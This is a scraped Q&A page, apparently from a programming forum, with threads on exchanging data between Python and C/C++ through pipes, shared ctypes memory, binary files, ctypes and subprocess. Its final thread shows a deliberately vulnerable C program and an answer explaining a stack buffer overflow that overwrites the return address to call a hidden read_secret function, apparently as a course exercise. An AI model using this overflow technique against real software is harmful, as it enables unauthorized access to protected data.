How to pass a C struct to Python to get data? - python

I have code for both Python and C that need to communicate to each other through a pipe created by Popen. I have a test struct in C that needs to be passed back to Python but I can't seem to reconstruct that struct on the Python side. This is a much more complicated project but the struct I created below is just an example to get the code to work, and I can try to figure out the more advanced things later. I am not an expert in C, pointers and piping, and I do not have a clear understanding of it. Most of the C code below is just from my readings.
Python:
testStruct = struct.Struct('< i')
cProg = Popen("./cProg.out", stdin=PIPE, stdout=PIPE)
data = ""
dataRead = cProg.stdout.read(1)
while dataRead != "\n":
data += dataRead
dataRead = cProg.stdout.read(1)
myStruct = testStruct.unpack(data)
print myStruct.i
C:
typedef struct{
int i;
} TestStruct;
int main(void)
{
int wfd = fileno(stdout);
TestStruct t;
t.i = 5;
char sendBack[sizeof(t)];
memcpy(sendBack, &t, sizeof(t));
write(wfd, sendBack, sizeof(sendBack));
write(wfd, "\n", 1);
}
But when I run the Python code I get the error:
unpack requires a string argument of length 4
Like I said I do not understand how structs and C. If there's any suggestion on refining this code, or better yet another suggestion on passing a C struct back to Python to unpack and grab the data. I can read and write through the pipe, the code I have posted are just snippets from my actual code. I know that the issue has to do with sending of the struct back to Python through stdout.

Here's an example of reading data in Python from a C program through a pipe.
C Program
#include <stdio.h>
typedef struct{
int i;
int j;
} TestStruct;
int main() {
TestStruct ts = {11111, 22222};
fwrite(&ts, sizeof ts, 1, stdout);
return 0;
}
Python 2.7 Program
from subprocess import Popen, PIPE
from struct import calcsize, unpack
cprog = Popen("cprog", stdout=PIPE)
fmt = "#ii"
str = cprog.stdout.read(calcsize(fmt))
cprog.stdout.close()
(i, j) = unpack(fmt, str)
print i, j

Related

Sharing Python multiprocessing shared Value with C extension

I have two processes in python that share a single boolean flag:
from multiprocessing import Process, Value
class MyProcess(Process):
def __init__(self):
self.flag = Value('B',false)
# [...]
def run(self):
while self.active:
# do_something()
if some_condition:
self.work_to_be_extended__()
def work_to_be_extended__(self) -> bool:
while some_internal_loop_condition:
if self.flag.value:
# do something
return result
if __name__ == '__main__':
my_proc = MyProcess()
my_proc_flag = my_proc.flag
my_proc.start()
# [...] Some work
if condition:
my_proc_flag.value = True
I need to put MyProcess.work_to_be_extended in an extension module to be executed in C code. Something like:
bool extended_work(void):
{
while (some_condition) {
if (my_proc_flag) {
do_something()
}
return result
}
I've not designed the extension yet, since I'd need to understand first how to share the MyProcess.flag variable. Please, note that I don't need to pass the variable value, I need to pass its reference in order for the extension to see a change in the flag value operated in the main process where the extension does not live`.
Hope I've been quite clear**
Multiprocessing has a sharedctypes submodule for ctypes array and values. You can use it to create a shared ctypes (a int in my example). And then use ctypes.byref to send a pointer to that int.
Since the underlying mechanism is SHM (not some hidden piping under the hood), the pointed memory by this reference is really the same in both process. shval.value is *p pointed by the p argument passed, that is byref(shval).
So, no need for the size 1 array of my previous answer, and, more importantly, for the disclaimer accompanying it.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
void myf(volatile uint32_t *p){
for(;;){
printf("<c>%d</c>\n", *p);
if(*p==100) return;
(*p)++;
sleep(1);
}
}
import multiprocessing as mp
import multiprocessing.sharedctypes as st
import ctypes
mylib=ctypes.CDLL("libtoto.so")
mylib.myf.argtypes=[ctypes.c_void_p]
shval=st.RawValue(st.ctypes.c_uint32,12)
class MyProcess(mp.Process):
def __init__(self):
super().__init__()
def run(self):
mylib.myf(st.ctypes.byref(shval))
if __name__=="__main__":
myproc=MyProcess()
myproc.start()
while True:
i=int(input("val>"))
shval.value=i
So, short answer to your question is: use multiprocessing.sharedctypes and pass byref(sharedval) to your function.
Premise
This answer comes from an adaptation of the good solution given by #chrslg. This extends that usage to apply to other paradigm of Python/C programming, such as C Extension API, Cython and Boost::Python.
Please, read that answer first for a deeper background.
Overview and core summary:
Using a sharedctypes.RawValue as the required variable, it is possible to access the underlying data address by means of the method sharedctypes.ctypes.addressof.
Therefore, one can pass the address of the variable as a long long int (64 bit) and cast it into a pointer to the required data. For example, for a uint8_t variable, one has into the C extension
int64_t address; // This is initialized in some way, depending on the C interface to python
// Pointer to shared data
uint8_t* pointer = (uint8_t*)(address);
printf("Current value of shared data: %u\n", pointer);
Working example for different Python - C/C++ interfaces
Common C shared library
Let's create a base, simple C library that just read for 1 time per second the value of the variable being shared:
// cshare_data/cshare_data.c
#include "cshare_data.h"
#include <time.h>
#include <unistd.h>
#include <stdio.h>
void cshare_data(uint8_t* data, char from_where_called) {
char *s = NULL;
if (from_where_called == 0) {
s = "cTypes CDLL";
} else if (from_where_called == 1)
{
s = "Python C Extension";
} else if (from_where_called == 2)
{
s = "Boost::Python";
} else if (from_where_called == 3)
{
s = "Cython";
}
for (int i = 0; i < 10; i++) {
printf("C code read from %s a value of: %u\n", s, *data);
sleep(1);
}
}
The header:
// cshare_data/cshare_data.h
#ifndef CSHARE_DATA_H
#define CSHARE_DATA_H
#include <stdint.h>
#include <stddef.h>
extern void cshare_data(uint8_t*, char);
#endif
Python shared data editing process
For the rest of the examples, I'll refer to the following Python process that is modifying the shared data (unsigned char in the example):
from multiprocessing.sharedctypes import RawValue, Value
import multiprocessing.sharedctypes as st
from multiprocessing import Process
class MyProcess(Process):
def __init__(self):
Process.__init__(self)
self.int_val = RawValue(st.ctypes.c_ubyte, 0)
def run(self) -> None:
import time
for _ in range(10):
print('Value in Python Process: ', self.int_val.value)
self.int_val.value += 1
time.sleep(1)
my_proc = MyProcess()
my_proc.start()
NOTE: This will not be repeated hereinafter.
Python C Extension
A Python C Extension API that makes use of the above pattern follows:
#include <Python.h>
#include <stdio.h>
#include <time.h>
#include "cshare_data.h"
static PyObject *cshare_data_wrapper(PyObject *self, PyObject *args)
{
PyObject *val = NULL;
// This will store the address of the uchar variable being passed from Python
int64_t address = 0;
// Convert the single element tuple into a 8-byte int (address)
if(!PyArg_ParseTuple(args, "L", &address)) {
printf("Error parsing Tuple\n");
return NULL;
}
// Now address is reinterpreted as the shared variable pointer
uint8_t *pointer = (uint8_t *)(address);
// Call the library function
cshare_data(pointer, 1);
return Py_None;
}
static PyMethodDef CShapreDataMethods[] = {
{"cshare_data", cshare_data_wrapper, METH_VARARGS, "Python interface for sharedata C library function"},
{NULL, NULL, 0, NULL}
};
static struct PyModuleDef cshareddata_module = {
PyModuleDef_HEAD_INIT,
"csharedata_module",
"Python interface for the fputs C library function",
-1,
CShapreDataMethods
};
PyMODINIT_FUNC PyInit_cshare_data_pyext(void) {
return PyModule_Create(&cshareddata_module);
}
Please, refer to official documentation and this very good tutorial for deeper insight about Python C-API
Boost::Python
Very similar to what done for the Python C-API, the boost wrapper looks like:
extern "C" {
#include "cshare_data.h"
}
#include <boost/python.hpp>
void cshare_data_boost_wrapper(long long int data_address) {
uint8_t* data = reinterpret_cast<uint8_t*>(data_address);
cshare_data(data, 2);
}
BOOST_PYTHON_MODULE(ctrigger) {
using namespace boost::python;
def("cshare_data", cshare_data_boost_wrapper);
}
CMake - Library buildings
Moving from a project with the following tree structure:
```
project_root
| cshare_data.py
|---clibs
| | cshare_data_boost.so
| | cshare_data_pyext.so
| | cshare_data.so
|
|---cshare_data
| | cshare_data.c
| | cshare_data.h
|
| CMakeList.txt
```
The following compilation CMake script was used:
cmake_minimum_required (VERSION 2.6)
project (cshare_data)
set(CMAKE_SHARED_MODULE_PREFIX "")
set(CMAKE_SHARED_LIBRARY_PREFIX "")
# Common C shared library
set(CMAKE_LIBRARY_OUTPUT_DIRECTORY ${CMAKE_SOURCE_DIR}/clibs)
include_directories(${CMAKE_SOURCE_DIR}/cshare_data)
link_directories(${CMAKE_SOURCE_DIR}/clibs)
# --- Common C shared library ---
add_library(cshare_data SHARED cshare_data/cshare_data.c)
# Needed for Python C Extension Module and Boost::Python
include_directories("/usr/include/python3.8")
# --- Python C Extension Module library ---
add_library(cshare_data_pyext MODULE cshare_data_pyinterface/cshare_data_pyext.c)
target_link_libraries(cshare_data_pyext python3.8)
target_link_libraries(cshare_data_pyext cshare_data)
# --- Python C Extension Module library ---
include_directories("/home/buzz/boost_1_80_0")
link_directories("/home/buzz/boost_1_80_0/build/lib")
add_library(cshare_data_boost MODULE cshare_data_pyinterface/cshare_data_boost.cpp)
target_link_libraries(cshare_data_boost python3.8)
target_link_libraries(cshare_data_boost boost_python38)
target_link_libraries(cshare_data_boost cshare_data)
Python - Calling C wrappers
Just for the purpose of demonstration, I've written 3 different processes that share the same int_val (handled by the above MyProcess) and call the C function to print the value of this variable. Note that, though the lines of code are the same, the address must be withdrawn at each process call since multiprocessing.sharedctypes wraps IPC synchronizing architecture for int_val under the hood, meaning that each actual int_val lives in the proper process.
my_proc = MyProcess()
my_proc.start()
l = []
class FromWhere(IntEnum):
ctype = 0
python_c_extension = 1
boost_python = 2
def from_ctype_import_dll(int_val: RawValue):
import ctypes
reference = st.ctypes.byref(my_proc.int_val)
mylib=ctypes.CDLL("clibs/cshare_data.so")
mylib.cshare_data.argtypes=[ctypes.c_void_p, ctypes.c_char]
mylib.cshare_data(reference, FromWhere.ctype.value)
def from_python_c_extension(int_val: RawValue):
from clibs import cshare_data_pyext
address = st.ctypes.addressof(int_val)
cshare_data_pyext.cshare_data(address)
def from_boost_python(int_val: RawValue):
from clibs import cshare_data_boost
address = st.ctypes.addressof(int_val)
cshare_data_boost.cshare_data(address)
ps: List[Process] = []
ps.append(Process(target=from_ctype_import_dll, args=(my_proc.int_val,)))
ps.append(Process(target=from_python_c_extension, args=(my_proc.int_val,)))
ps.append(Process(target=from_boost_python, args=(my_proc.int_val,)))
for p in ps:
p.start()
for p in ps:
p.join()
The result achieved:
Value in Python Process: 0
C code read from cTypes CDLL a value of: 1
C code read from Python C Extension a value of: 1
C code read from Boost::Python a value of: 1
Value in Python Process: 1
C code read from cTypes CDLL a value of: 2
C code read from Boost::Python a value of: 2
C code read from Python C Extension a value of: 2
Value in Python Process: 2
C code read from cTypes CDLL a value of: 3
C code read from Boost::Python a value of: 3
C code read from Python C Extension a value of: 3
C code read from cTypes CDLL a value of: 3
Value in Python Process: 3
C code read from Boost::Python a value of: 4
C code read from Python C Extension a value of: 4
C code read from cTypes CDLL a value of: 4
Value in Python Process: 4
C code read from Boost::Python a value of: 5
C code read from Python C Extension a value of: 5
C code read from cTypes CDLL a value of: 5
Value in Python Process: 5
C code read from Boost::Python a value of: 6
C code read from Python C Extension a value of: 6
C code read from cTypes CDLL a value of: 6
Value in Python Process: 6
C code read from Python C Extension a value of: 7
C code read from Boost::Python a value of: 7
C code read from cTypes CDLL a value of: 7
Value in Python Process: 7
C code read from Python C Extension a value of: 8
C code read from Boost::Python a value of: 8
C code read from cTypes CDLL a value of: 8
Value in Python Process: 8
C code read from Python C Extension a value of: 9
C code read from Boost::Python a value of: 9
C code read from cTypes CDLL a value of: 9
Value in Python Process: 9
C code read from Python C Extension a value of: 10
C code read from Boost::Python a value of: 10

Using Python to write a mix of integer and floating point numbers to a binary file read by a code in C

I have code in C which reads data from a file in a binary format:
FILE *file;
int int_var;
double double_var;
file = fopen("file.dat", "r");
fread(&int_var, sizeof(int), 1, file);
fread(&double_var, sizeof(double), 1, file);
The above is a simplified but accurate version of the actual code. I have no choice over this code or the format of this file.
The data being read in C is produced using Python code. How do I write this data to a file in the same binary format? I looked into bytes and bytearrays, but they seem to only work with integers and strings. I need something like:
f = open('file.dat', 'wb')
f.write(5)
f.write(5.0)
f.close()
that will work with the above C code.
As mentioned in a comment, you need the struct library:
Creating file.dat with
#!/usr/bin/env python3
import struct
with open('file.dat', 'wb') as f:
f.write(struct.pack('=id', 1, 5.0))
and then reading it with
#include <stdio.h>
int main(void) {
int int_var;
double double_var;
FILE *file = fopen("file.dat", "rb");
if (!file) {
fprintf(stderr, "couldn't open file.dat!\n");
return 1;
}
if (fread(&int_var, sizeof(int), 1, file) != 1) {
fprintf(stderr, "failed to read int!\n");
return 1;
}
if (fread(&double_var, sizeof(double), 1, file) != 1) {
fprintf(stderr, "failed to read double!\n");
return 1;
}
printf("int = %d\ndouble = %f\n", int_var, double_var);
fclose(file);
return 0;
}
will output
int = 1
double = 5.000000
Note the = in the pack format definition; that tells python not to add alignment padding bytes like you'd get in a C structure like
struct foo {
int int_var;
double double_Var;
};
Without that, you'll get unexpected results reading the double in this example. You also have to worry a little bit about endianess if you want the file to be portably read on any other computer.

Trying to open a dll written in c with python ctypes and run the function in it, but it comes as int, not a string

These are my example source code:
C
#include <stdio.h>
#include <stdlib.h>
__declspec(dllexport)
char* sys_open(char* file_name)
{
char *file_path_var = (char *) malloc(100*sizeof(char));
FILE *wrt = fopen(file_name, "r");
fscanf(wrt, "%s", file_path_var);
fclose(wrt);
return file_path_var;
}
Test.txt
test
Python
from ctypes import *
libcdll = CDLL("c.dll")
taken_var = libcdll.sys_open("test.txt")
print("VAR: ", taken_var)
Result
VAR: 4561325
So I'm just getting a random number. What should i do?
I'm not a C developer, but isn't sys_open returning a pointer?. Last time I checked pointers are WORD sized memory addresses in HEX, so it might make sense that python sees a numerical value in HEX and converts it to a decimal?. Maybe what you want to return from your C funcion is &file_path_var
I found the true one.
The python file was wrong, must be:
from ctypes import *
libcdll = CDLL("c.dll")
taken_var = libcdll.sys_open("test.txt")
print("VAR: ", c_char_p(taken_var).value)

How to use Python to input to and get output from C++ program?

I'm currently trying to automate the testing of a C++ program which takes input from the terminal and outputs the result onto the terminal. For example my C++ file would do something like below:
#include <iostream>
int main() {
int a, b;
std::cin >> a >> b;
std::cout << a + b;
}
And my Python file used for testing would be like:
as = [1, 2, 3, 4, 5]
bs = [2, 3, 1, 4, 5]
results = []
for i in range(5):
# input a[i] and b[i] into the C++ program
# append answer from C++ program into results
Although it is possible to input and output from C++ through file I/O, I'd rather leave the C++ program untouched.
What can I do instead of the commented out lines in the Python program?
You could use subprocess.Popen. Sample code:
#include <iostream>
int sum(int a, int b) {
return a + b;
}
int main ()
{
int a, b;
std::cin >> a >> b;
std::cout << sum(a, b) << std::endl;
}
from subprocess import Popen, PIPE
program_path = "/home/user/sum_prog"
p = Popen([program_path], stdout=PIPE, stdin=PIPE)
p.stdin.write(b"1\n")
p.stdin.write(b"2\n")
p.stdin.flush()
result = p.stdout.readline().strip()
assert result == b"3"
python_program.py | cpp_program
On the command line will feed the standard output of python_program.py into the standard input of cpp_program.
This works for all executables, no matter what programming language they are written in.
You can comunicate it by .txt
Write txt with your matrix and read it on Python, 2 programms cant use same memory.
Else use Cython and code your C++ on Python
https://github.com/cythonbook/examples/tree/master/07-wrapping-c/01-wrapping-c-functions-mt-random
You can use supproccess for getting data from called program, example for whois:
import subprocess
proc = subprocess.Popen(['whois', 'google.com'], stdout=subprocess.PIPE)
data = proc.communicate()[0]
print( data )
You will need to use pythons subprocess module (https://docs.python.org/2/library/subprocess.html) to start your compiled C++ application and send in your variables and read the output of the subprocess using Popen.communicate() (https://docs.python.org/2/library/subprocess.html#subprocess.Popen.communicate).
Example code might look like:
import subprocess
p = subprocess.Popen(["cpp_app", stdin=subprocess.PIPE,stdout=subprocess.PIPE)
out, _ = p.communicate(b"1 2")
print(out, err)

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Categories